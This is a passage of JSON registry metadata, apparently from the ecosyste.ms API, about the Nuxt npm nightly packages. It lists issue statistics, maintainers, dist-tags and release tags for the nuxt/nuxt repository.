hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.0/manifests"}]},"repo_metadata_updated_at":"2026-05-11T14:13:41.971Z","dependent_packages_count":0,"downloads":11264,"downloads_period":"last-month","dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":24.881346129003017,"dependent_packages_count":35.91910181813241,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":30.400223973567712},"purl":"pkg:npm/%40nuxt/docs-nightly","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/@nuxt/docs-nightly","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/npm/@nuxt/docs-nightly","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/@nuxt/docs-nightly/dependencies","status":null,"funding_links":["https://opencollective.com/nuxtjs","https://github.com/sponsors/nuxt"],"critical":null,"issue_metadata":{"last_synced_at":"2026-05-11T09:29:38.633Z","issues_count":6017,"pull_requests_count":6878,"avg_time_to_close_issue":11682718.831972789,"avg_time_to_close_pull_request":788508.7928300017,"issues_closed_count":4405,"pull_requests_closed_count":6053,"pull_request_authors_count":594,"issue_authors_count":3408,"avg_comments_per_issue":4.155559248795081,"avg_comments_per_pull_request":2.497092177958709,"merged_pull_requests_count":5387,"bot_issues_count":12,"bot_pull_requests_count":2976,"past_year_issues_count":517,"past_year_pull_requests_count":706,"past_year_avg_time_to_close_issue":614357.4583333334,"past_year_avg_time_to_close_pull_request":247482.47599164926,"past_year_issues_closed_count":264,"past_year_pull_requests_closed_count":479,"past_year_pull_request_authors_count":97,"past_year_issue_authors_count":406,"past_year_avg_comments_per_issue":2.2359767891682787,"past_year_avg_comments_per_pull_request":3.0793201133144477,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":248,"past_year_merged_pull_requests_count":419,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/issues","maintainers":[{"login":"danielroe","count":1325,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/danielroe"},{"login":"huang-julien","count":364,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huang-julien"},{"login":"DamianGlowala","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/DamianGlowala"},{"login":"pi0","count":98,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pi0"},{"login":"Mini-ghost","count":91,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mini-ghost"},{"login":"manniL","count":76,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/manniL"},{"login":"BobbieGoede","count":70,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/BobbieGoede"},{"login":"antfu","count":63,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/antfu"},{"login":"userquin","count":50,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/userquin"},{"login":"cernymatej","count":44,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/cernymatej"},{"login":"TheAlexLichter","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheAlexLichter"},{"login":"OrbisK","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/OrbisK"},{"login":"wattanx","count":25,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/wattanx"},{"login":"Atinux","count":24,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Atinux"},{"login":"ineshbose","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ineshbose"},{"login":"atinux","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/atinux"},{"login":"productdevbook","count":16,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/productdevbook"},{"login":"dargmuesli","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dargmuesli"},{"login":"Hebilicious","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Hebilicious"},{"login":"warflash","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/warflash"},{"login":"lihbr","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lihbr"},{"login":"madebyfabian","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/madebyfabian"},{"login":"KazariEX","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/KazariEX"},{"login":"HugoRCD","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/HugoRCD"},{"login":"clarkdo","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/clarkdo"},{"login":"romhml","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/romhml"},{"login":"posva","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/posva"},{"login":"farnabaz","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/farnabaz"},{"login":"arashsheyda","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arashsheyda"},{"login":"adhamfarrag","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/adhamfarrag"},{"login":"kikudesuyo","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kikudesuyo"},{"login":"Diizzayy","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Diizzayy"},{"login":"Flo0806","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Flo0806"},{"login":"msmakouz","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/msmakouz"},{"login":"kazupon","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kazupon"},{"login":"benjamincanac","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/benjamincanac"},{"login":"vargasmesh","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vargasmesh"}],"active_maintainers":[{"login":"danielroe","count":149,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/danielroe"},{"login":"OrbisK","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/OrbisK"},{"login":"huang-julien","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huang-julien"},{"login":"cernymatej","count":24,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/cernymatej"},{"login":"BobbieGoede","count":23,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/BobbieGoede"},{"login":"DamianGlowala","count":17,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/DamianGlowala"},{"login":"TheAlexLichter","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheAlexLichter"},{"login":"KazariEX","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/KazariEX"},{"login":"Mini-ghost","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mini-ghost"},{"login":"wattanx","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/wattanx"},{"login":"romhml","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/romhml"},{"login":"HugoRCD","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/HugoRCD"},{"login":"productdevbook","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/productdevbook"},{"login":"atinux","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/atinux"},{"login":"ineshbose","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ineshbose"},{"login":"Flo0806","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Flo0806"},{"login":"dargmuesli","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dargmuesli"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fdocs-nightly/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fdocs-nightly/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fdocs-nightly/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fdocs-nightly/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fdocs-nightly/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fdocs-nightly/codemeta","maintainers":[{"uuid":"nuxtbot","login":"nuxtbot","name":null,"email":"nuxtbot@roe.dev","url":null,"packages_count":148,"html_url":"https://www.npmjs.com/~nuxtbot","role":null,"created_at":"2025-04-03T16:02:37.840Z","updated_at":"2025-04-03T16:02:37.840Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/nuxtbot/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5608775,"maintainers_count":1189233,"namespaces_count":373614,"keywords_count":0,"github":"npm","metadata":{"funded_packages_count":166557},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2026-04-03T05:46:01.652Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":8418112,"name":"@nuxt/vite-builder-nightly","ecosystem":"npm","description":"Vite bundler for Nuxt","homepage":"https://nuxt.com","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/nuxt/nuxt","keywords_array":[],"namespace":"nuxt","versions_count":925,"first_release_published_at":"2023-10-12T12:21:12.646Z","latest_release_published_at":"2023-10-12T12:21:12.646Z","latest_release_number":"0.0.0","last_synced_at":"2026-03-19T22:03:38.505Z","created_at":"2023-10-12T12:25:12.244Z","updated_at":"2026-03-19T22:03:38.505Z","registry_url":"https://www.npmjs.com/package/@nuxt/vite-builder-nightly","install_command":"npm install @nuxt/vite-builder-nightly","documentation_url":null,"metadata":{"funding":null,"dist-tags":{"pr-22649":"3.9.0-28354214.15a5e77d","pr-24010":"3.9.0-28378645.e9794ea0","pr-24787":"3.9.0-28378659.75a82c63","pr-24922":"3.10.0-28394973.15b95165","pr-24894":"3.10.0-28404855.4f7de5af","pr-23368":"3.10.0-28412264.57594fa2","pr-25210":"3.10.0-28422040.922a0429","pr-24960":"3.9.2-28423518.40bfb173","pr-25071":"3.10.0-28425618.d0e71656","pr-25770":"3.10.2-28463758.ae976d69","pr-26085":"3.11.0-28494221.a1f9ca9e","pr-25936":"3.11.0-28508900.dcd73d30","pr-26928":"3.12.0-28567604.d4b61ffd","pr-27037":"3.12.0-28577690.5048d11c","3x":"3.14.160-28864559.da7370df","latest":"4.0.0-28864692.67456810"}},"repo_metadata":{"id":37288797,"uuid":"71995937","full_name":"nuxt/nuxt","owner":"nuxt","description":"The Intuitive Vue Framework.","archived":false,"fork":false,"pushed_at":"2024-10-29T20:55:49.000Z","size":114898,"stargazers_count":54703,"open_issues_count":872,"forks_count":5004,"subscribers_count":793,"default_branch":"main","last_synced_at":"2024-10-29T21:25:05.500Z","etag":null,"topics":["csr","framework","full-stack","hacktoberfest","hybrid","node","nuxt","server-rendering","ssg","ssr","static-site-generator","universal","vue"],"latest_commit_sha":null,"homepage":"https://nuxt.com","language":"TypeScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/nuxt.png","metadata":{"files":{"readme":"README.md","changelog":"changelog.config.json","contributing":null,"funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null},"funding":{"github":["nuxt"],"open_collective":"nuxtjs"}},"created_at":"2016-10-26T11:18:47.000Z","updated_at":"2024-10-29T18:14:58.000Z","dependencies_parsed_at":"2023-12-19T04:00:01.692Z","dependency_job_id":null,"html_url":"https://github.com/nuxt/nuxt","commit_stats":{"total_commits":5138,"total_committers":630,"mean_commits":8.155555555555555,"dds":0.6897625535227715,"last_synced_commit":"800902df129a13e0da40b04b3a09e0d1a9852820"},"previous_names":["nuxt/nuxt.js"],"tags_count":223,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":222121833,"owners_count":16934971,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"nuxt","name":"Nuxt","uuid":"23360933","kind":"organization","description":"The Intuitive Vue Framework","email":null,"website":"https://nuxt.com","location":"Global","twitter":"nuxt_js","company":null,"icon_url":"https://avatars.githubusercontent.com/u/23360933?v=4","repositories_count":61,"last_synced_at":"2024-05-20T15:02:00.816Z","metadata":{"has_sponsors_listing":true},"html_url":"https://github.com/nuxt","funding_links":["https://github.com/sponsors/nuxt"],"total_stars":99051,"followers":3259,"following":0,"created_at":"2022-11-02T16:30:40.909Z","updated_at":"2024-05-20T15:02:03.446Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt/repositories"},"tags":[{"name":"v3.11.1","sha":"a80d1a0d6349bf1003666fc79a513c0d7370c931","kind":"commit","published_at":"2024-03-18T21:33:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.11.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.1/manifests"},{"name":"v3.11.0","sha":"78d5098c28d2e21622961d8b87ef9b4623194fec","kind":"commit","published_at":"2024-03-17T08:15:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.11.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.0/manifests"},{"name":"v3.10.3","sha":"aaad9924339b4c45d7feb45ed84bac4052edfcf0","kind":"commit","published_at":"2024-02-22T13:56:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.3/manifests"},{"name":"v3.10.2","sha":"ceebcde36642fd3711a2567658cb1337a0475153","kind":"commit","published_at":"2024-02-14T13:00:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.2/manifests"},{"name":"v3.10.1","sha":"460e0cfebd0ad19c7928c8d986e59f93a1bba1a3","kind":"commit","published_at":"2024-02-05T16:48:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.1/manifests"},{"name":"v3.10.0","sha":"da3c502f08587f93e1134bc8e7aea1dee8d628fb","kind":"commit","published_at":"2024-01-30T15:25:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.0/manifests"},{"name":"v3.9.3","sha":"fd8b263326c8703815a7e043948c22a8e5b969e2","kind":"commit","published_at":"2024-01-17T14:19:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.3/manifests"},{"name":"v3.9.2","sha":"97ed2df423ebd8038f16d81e00cd2836ba2d712a","kind":"commit","published_at":"2024-01-16T17:00:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.2/manifests"},{"name":"v2.17.3","sha":"4aa989d68a1934bd107fc5ad4e87549d39277ecd","kind":"tag","published_at":"2024-01-12T15:13:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.3/manifests"},{"name":"v3.9.1","sha":"6736decba0dc8bbc7276848a8a26973440ebdee4","kind":"commit","published_at":"2024-01-05T21:55:58.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.1/manifests"},{"name":"v3.9.0","sha":"c28ef02a1779b1c8a30c3daa2049d3c81a88ac91","kind":"commit","published_at":"2023-12-25T17:24:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.0/manifests"},{"name":"v3.8.2","sha":"8d1fc6c4a9b0f6a662a006489162e66fdeb677b1","kind":"commit","published_at":"2023-11-20T22:22:16.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.8.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.2/manifests"},{"name":"v3.8.1","sha":"d8674b99820d0e4dd620b20d38efb2ee52c80e52","kind":"commit","published_at":"2023-11-06T11:54:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.8.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.1/manifests"},{"name":"v2.17.2","sha":"2080d82471962a5a6ea2c7b38c8975c961e919f8","kind":"tag","published_at":"2023-10-24T03:05:46.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.2/manifests"},{"name":"v3.8.0","sha":"59ff865b133aaf82876f73b2d0566a00081b2795","kind":"commit","published_at":"2023-10-19T15:21:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.8.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.0/manifests"},{"name":"v3.7.4","sha":"5abd8a231f26a2e08071a59caa87b80eaaa6cd91","kind":"commit","published_at":"2023-09-26T00:18:14.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.4/manifests"},{"name":"v3.7.3","sha":"16e40f899e753208dd270c30869d240fbff0b8a2","kind":"commit","published_at":"2023-09-13T22:52:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.3/manifests"},{"name":"v3.7.2","sha":"ebacf199fe52b9dfd5cb48f2f4735df0e9adbaac","kind":"commit","published_at":"2023-09-12T21:35:55.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.2/manifests"},{"name":"v3.7.1","sha":"88a6d0a499cc7696bff94c02548cd9cc60f7820b","kind":"commit","published_at":"2023-09-05T13:49:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.1/manifests"},{"name":"v3.7.0","sha":"9013f88e75f499e650463e3c80d116d0ce898a14","kind":"commit","published_at":"2023-08-25T23:26:08.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.0/manifests"},{"name":"v3.6.5","sha":"f6a3adb52156774ab372829a2ee2533906758288","kind":"commit","published_at":"2023-07-19T17:40:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.5/manifests"},{"name":"v3.6.4","sha":"380a91985c350281aba2d8eb16c65b0ebc39ea8b","kind":"commit","published_at":"2023-07-19T15:19:14.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.4/manifests"},{"name":"v3.6.3","sha":"f068ad5edda4aaf79906a58ab472c9c3c0f564f1","kind":"commit","published_at":"2023-07-14T22:48:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.3/manifests"},{"name":"v2.17.1","sha":"9de25afa865ca6861a7bb6e3b6b89df56616d93d","kind":"tag","published_at":"2023-07-14T22:35:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.1/manifests"},{"name":"v3.6.2","sha":"88f914e9a01cb8ed196afb653dbcb4f7a5123b15","kind":"commit","published_at":"2023-07-05T21:42:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.2/manifests"},{"name":"v3.6.1","sha":"54a0d5e8dc2184f995169e6b4c5adaba9cffaa6c","kind":"commit","published_at":"2023-06-26T19:25:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.1","dependencies_